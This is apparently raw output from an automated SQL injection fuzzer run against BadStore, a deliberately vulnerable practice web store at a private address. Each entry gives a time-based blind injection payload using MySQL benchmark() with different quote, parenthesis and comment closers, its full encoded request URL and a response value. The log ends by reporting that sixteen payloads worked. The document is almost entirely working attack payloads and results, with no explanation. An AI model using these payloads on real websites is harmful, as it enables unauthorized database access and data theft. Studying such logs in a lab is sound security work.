' and 0=benchmark(3000000,MD5(1))%20--
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520--&action=search&x=0&y=0
	473

' and 0=benchmark(3000000,MD5(1))%20%23
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520%2523&action=search&x=0&y=0
	473

') and 0=benchmark(3000000,MD5(1))%20/*
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520/%2A&action=search&x=0&y=0
	500

') and 0=benchmark(3000000,MD5(1))%20--
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520--&action=search&x=0&y=0
	500

') and 0=benchmark(3000000,MD5(1))%20%23
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520%2523&action=search&x=0&y=0
	500

')) and 0=benchmark(3000000,MD5(1))%20/*
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520/%2A&action=search&x=0&y=0
	500

')) and 0=benchmark(3000000,MD5(1))%20--
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520--&action=search&x=0&y=0
	500

')) and 0=benchmark(3000000,MD5(1))%20%23
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520%2523&action=search&x=0&y=0
	500

'))) and 0=benchmark(3000000,MD5(1))%20/*
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520/%2A&action=search&x=0&y=0
	500

'))) and 0=benchmark(3000000,MD5(1))%20--
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520--&action=search&x=0&y=0
	500

'))) and 0=benchmark(3000000,MD5(1))%20%23
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520%2523&action=search&x=0&y=0
	500

')))) and 0=benchmark(3000000,MD5(1))%20/*
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520/%2A&action=search&x=0&y=0
	500

')))) and 0=benchmark(3000000,MD5(1))%20--
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520--&action=search&x=0&y=0
	500

')))) and 0=benchmark(3000000,MD5(1))%20%23
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%27%29%29%29%29%20and%200%3Dbenchmark%283000000%2CMD5%281%29%29%2520%2523&action=search&x=0&y=0
	500


	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=&action=search&x=0&y=0
	4137


	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=&action=search&x=0&y=0
	4137

16 worked
[*] Runtime: 0.970719099045